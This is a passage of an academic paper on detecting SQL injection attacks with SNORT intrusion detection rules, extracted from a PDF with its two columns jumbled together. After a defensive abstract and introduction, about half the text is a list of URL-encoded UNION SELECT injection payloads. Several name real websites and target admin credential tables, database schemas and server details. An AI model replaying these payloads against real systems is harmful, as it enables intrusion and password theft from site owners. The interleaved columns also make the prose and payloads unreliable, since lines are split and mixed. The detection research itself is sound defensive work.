Académique Documents
Professionnel Documents
Culture Documents
discussions, stats, and author profiles for this publication at: https://www.researchgate.net/publication/278677876
CITATIONS READS
0 1,683
3 authors, including:
All content following this page was uploaded by Quazi Mamun on 18 June 2015.
The user has requested enhancement of the downloaded file. All in-text references underlined in blue are added to the original document
and are linked to publications on ResearchGate, letting you access and read them immediately.
Detecting SQL Injection Attacks Using SNORT IDS
Abstract—SQL injection attack poses a serious security action, it creates an alert which contains information about the
threats among the Internet community nowadays and it’s source, target, and preview type of the attack SNORT is one of
continue to increase exploiting flaws found in the Web the effective and a popular rule based Network Intrusion
applications. In SQL injection attack, the attackers can take Detection System (NIDS) tools to identify intrusion attacks
advantage of poorly coded web application software to introduce [3]. It is an open-source software developed by Martin Roesch
malicious code into the system and/or could retrieve important
[3], and it uses regular expression-based rules for intrusion
information. Web applications are under siege from cyber
criminals seeking to steal confidential information and disable or detection. SNORT is a packet sniffer that monitors network
damage the services offered by these application. Therefore, traffic in real time and supports protocols including TCP,
additional steps must be taken to ensure data security and UDP, IP and ICMP [3]. It verifies each packet closely to
integrity of the applications. In this paper we propose an detect a unsafe payload or suspicious anomalies. When a
innovative solution to filter the SQL injection attack using suspicious behavior is identified, SNORT immediately
SNORT IDS. The proposed detection technique uses SNORT tool generates a real-time alert by logging it to the alert file, and/or
by augmenting a number of additional SNORT rules. We activating a popup window. SQL Injection and XSS (Cross-
evaluate the proposed solution by comparing our method with site scripting) are the most common and serious web
several existing techniques. Experimental results demonstrate
application vulnerabilities threatening the privacy and security
that the proposed method outperforms other similar techniques
using the same data set. of both clients and applications nowadays [6]. It causes
serious threats among the Internet user community due to its
Keywords—SQL Injection, SNORT, Intrusion detection, recent dynamic attack patterns [10]. The current IDS are not
topology. sufficient to prevent or generate real-time security alerts to the
users [8]. It has been investigated how SQL injection attacks
I. INTRODUCTION are conducted and how hackers use SQL injection to attack
The Internet has rapidly become an integral part of web applications [9]. To mitigate this problem, developers
everyday life and our reliance on it is expected to continue to have proposed a range of coding guidelines that promote
grow. However, its rapid adoption has also left it susceptible defensive coding practices, such as encoding user input and
to misuse and/or abuse. Along with the growth of the Internet, validation [6]. Researchers also proposed many vulnerability
there has been a dramatic growth in SQL Injection Attack detection approaches such as static taint analysis [4] and
(SQLIA) [1]. It is a major concern that despite the increasing conolic testing [5], however, these techniques suffer from high
development of IDS (Intrusion detection system) and FP (false positive) instances.
antimalware services and technologies, the volume of SQLIA Conversely, there are many types of SQLIAs and its
continues to grow day by day [1]. Therefore, effective and numerous variations of its basic types. However, researchers
efficient detection techniques are of critical importance to the are often unaware about its variations, and most of their
computer user community. Over the last decade, researchers proposed solutions detect or prevent only a subset of the
have adopted a diversity of solutions in order to control the possible SQLIAs. Therefore, it has become a challenge for the
SQLIA [1, 2, 3, 13, 14, 15, 6 &16]. SQLIA is one of the most research community to develop an active defense technique
devastating techniques for stealing data from backend. It also against the SQL Injection and XSS attack. Keeping this in
has been argued that SQLIA comes under the top ten security mind, we have investigated several alternatives for SNORT
threats in web applications [6]. Using this kind of attack an rules and evaluate its performances. Based on our
attacker can get access to the database and steal classified investigations, we propose a set of rules for SNORT tool. Our
information. The concept of IDS was initially appeared in empirical performance shows that our technique outperforms
James Anderson’s technical report [2] in 1980. This first with similar existing techniques using similar data set.
generation IDS could monitor, audit, and log an attacked The main contributions of this paper are three folds:
machine. The main task was to search the audit logs for A. Analyses the SNOT IDS and propose five different
predefined patterns of a suspicious activity [2]. Most IDSs are snort rules.
reliable in detecting suspicious actions by evaluating TCP/IP
connections or log files, when the IDS finds a suspicious
B. Apply the proposed SNORT rules in our experiment
for detection evaluation.
C. Apply our method on Damn Vulnerable Web
Application (DVWA) to evaluate the performance.
The rest of the paper organized as follows: section 2
discusses the related work, section 3 outlines the problem
statement, section 4 discusses the proposed SNORT rules and
section 5 demonstrates the experimental setup and results.
Finally the paper concludes with discussion and conclusion.
Webpage?subcatid=40%20union%20select%20fld_pass http://www.telesensory.com/product.aspx?category=por
word,2,3,4,5,6- table&id=-
%20from%20tbl_admin%20where%20fld_password%2 1%20union%20all%20select%201,2,3,4,5,group_concat
0=%20null%20or%20'value'='value' %28name,0x3a,pswd%29,7,8,9,10,11,12,13,14,15,16,17
,18%20from%20admin—
http://www.unitedpurpose.org/archive/article.php?id=-
100%20union%20select Webpage?subcatid=40%20union%20select%20group_c
%20%20%201,2,3,id,5,6,7,8,9,10,11,12,13%20from%2 oncat(fld_usrname,0x3a,fld_password),2,3,4,5,6%20from%20tbl_admin
0chapters%20where%20id=1%20or%201=1—
Webpage?subcatid=40%20union%20select%20group_c
http://www.vize.cz/en/news.php?id=- oncat(table_name),2,3,4,5,6%20from%20information_s
99%20UNION%20SELECT%201,group_concat(table_ chema.tables%20where%20table_schema=database()—
name),3,4,5,6%20from%20information_schema.tables
%20where%20table_schema=database()— http://www.niftybazzar.com/monthly_in_detail.php?Id=
-129%20union%20select%201,2,group_concat(admin,0x
http://www.marmoon.com/games.php?id=- 3a,pass),4,5,6%20from%20nifty_admin
437%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13—
http://www.garo.cc/text.php?pageid=-
Webpage?subcatid=40%20union%20select%20fld_pass 15%20union%20select%201,2,3,4,5,6,7,8,9—
word,2,3,4,5,6-%20from%20tbl_admin%20where%20fld_password%2
0=%20null%0aor%0a'value'%3d'value'%3b%23 Webpage?subcatid=-
40%20union%20select%20UUID(),2,3,4,5,6—
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6- http://www.telesensory.com/product.aspx?category=por
%20from%20tbl_admin%20where%20fld_password%2 table&id=-
0=%20null%20/******************/or/*********** 1%20union%20all%20select%201,group_concat%28tab
*******/1=1/**********/;/**/ le_name%29,3,4,5,user%28%29,7,8,database%28%29,1
0,11,12,13,14,15,16,17,18%20from%20information_sch
http://www.unitedpurpose.org/archive/article.php?id=- ema.tables%20where%20table_schema=database%28%29—
100%20union%20select%20%20%201,2,3,id,5,6,7,8,9,
10,11,12,13%20from%20chapters%20where%20id=1% Webpage?subcatid=40%20union%20select%20fld_pass
20or%201=1— word,2,3,4,5,6%20from%20tbl_admin%20where%20fld
_password%20=%20null%20or%20fld_password%20is
Webpage?subcatid=40%20union%20select%20fld_pass %20not%20null%3b%23
word,2,3,4,5,6-
%20from%20tbl_admin%20where%20fld_password%2 http://www.unitedpurpose.org/archive/article.php?id=-
0=%20null%20or%201%20like%201 100%20union%20select%201,2,3,group_concat(column
_name),5,6,7,8,9,10,11,12,13%20from%20information_
http://www.marmoon.com/games.php?id=- schema.columns%20where%20table_schema=database()—
437%20union%20select%201,2,3,group_concat(admin,
0x3a,pass),5,6,7,8,9,10,11,12,13%20from%20admin Webpage?subcatid=40%20union%20select%20fld_pass
Webpage?subcatid=40%20union%20select%20fld_pass word,2,3,4,5,6%20from%20tbl_admin%20where%20fld
word,2,3,4,5,6- _password%20=%20null%20or%201%3d1%3b%23
%20from%20tbl_admin%20where%20fld_usrname%20
LIKE%20'a%' http://www.garo.cc/text.php?pageid=16%20union%20se
http://www.eliteco-jo.com/elite/news_dtls.php?nid=- lect%201,group_concat(table_name),3,4,5,6,7,8,9%20fr
1%20union%20select%201,2,group_concat(job_no,0x3 om%20information_schema.tables%20where%20table_
a,user_id),4,5,6,7,8,9,10,11,12,13%20from%20compan schema=database()—
y_jobs
http://www.web.com/index.php?id=-1 union select
Webpage?subcatid=40%20union%20select%20fld_pass 1,concat(user()),3,4,5,6—
word,2,3,4,5,6-
%20from%20tbl_admin%20where%20fld_usrname%20
LIKE%20'%d%'
www.telesensory.com/product.aspx?category=portable
&id=-
1%20union%20all%20select%201,version%28%29,3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18—
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6-%20from%20tbl_admin%20where%20fld_usrname%20
xor%201=1
http://www.telesensory.com/product.aspx?category=por
table&id=-1%20union%20all%20select%201,@@datadir,3,4,5,6,7
,8,9,10,11,12,13,14,15,16,17,18—
http://www.eliteco-jo.com/elite/news_dtls.php?nid=-